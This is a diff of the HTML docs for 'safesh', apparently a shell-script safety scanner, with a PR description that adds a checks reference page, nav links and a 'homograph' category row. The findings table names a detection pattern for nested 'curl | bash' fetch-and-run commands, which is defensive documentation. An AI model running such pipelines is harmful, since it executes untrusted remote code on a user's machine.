+      localStorage.setItem('theme', 'dark');
+    } else {
+      document.documentElement.setAttribute('data-theme', 'light');
+      localStorage.setItem('theme', 'light');
+    }
+    syncIcon();
+  }
+
+  syncIcon();
+</script>
+</body>
+</html>

--- a/docs/index.html
+++ b/docs/index.html
@@ -455,6 +455,7 @@
       <span class="logo">safe<span>sh</span></span>
     </a>
     <nav>
+      <a href="checks.html">Checks</a>
       <a href="https://github.com/safesh/safesh">GitHub</a>
       <a href="https://github.com/safesh/safesh/releases">Releases</a>
       <a href="https://github.com/safesh/safesh/issues">Issues</a>
@@ -592,7 +593,7 @@
 <section class="findings">
   <div class="container">
     <h2>Finding categories</h2>
-    <p class="sub">All findings are reported with line numbers before you decide whether to proceed.</p>
+    <p class="sub">All findings are reported with line numbers before you decide whether to proceed. <a href="checks.html">See the full reference →</a></p>
     <table>
       <thead>
         <tr>
@@ -628,6 +629,10 @@
         <tr>
           <td><code>execution-chain</code></td>
           <td>Nested <code style="font-family:var(--mono);font-size:0.8em;color:var(--text)">curl | bash</code> inside the script</td>
+        </tr>
+        <tr>
+          <td><code>homograph</code></td>
+          <td>Bidi/zero-width characters and IDN-homograph URL hosts</td>
         </tr>
       </tbody>
     </table>


### PR DESCRIPTION
## Summary
- Adds `docs/checks.html`, a dedicated reference page that covers all eight finding categories in depth: what each check actually looks for (sourced from the analyzer modules), why it matters, why it carries its severity (critical / warning / info), and a small annotated example that trips it.
- Wires the page in via the home-page nav and a "See the full reference" link in the existing findings section.
- Adds the previously-missing `homograph` row to the home-page summary table so the two pages agree.

The new page reuses the existing CSS variable system (dark/light theme, surface/border/code-bg tokens) and matches the home page's typographic style — no new dependencies, no design reinvention.

## Test plan
- [ ] Open `docs/checks.html` via `file://` and confirm it renders cleanly in dark mode
- [ ] Toggle to light mode and confirm contrast is fine
- [ ] Click each entry in the in-page index and confirm the anchor scrolls to the matching section
- [ ] From `docs/index.html`, confirm the new "Checks" nav link and "See the full reference" link both navigate correctly
- [ ] Skim the `homograph` section to confirm bidi/zero-width terminology lines up with `internal/analyzer/modules/homograph.go`

🤖 Generated with [Claude Code](https://claude.com/claude-code)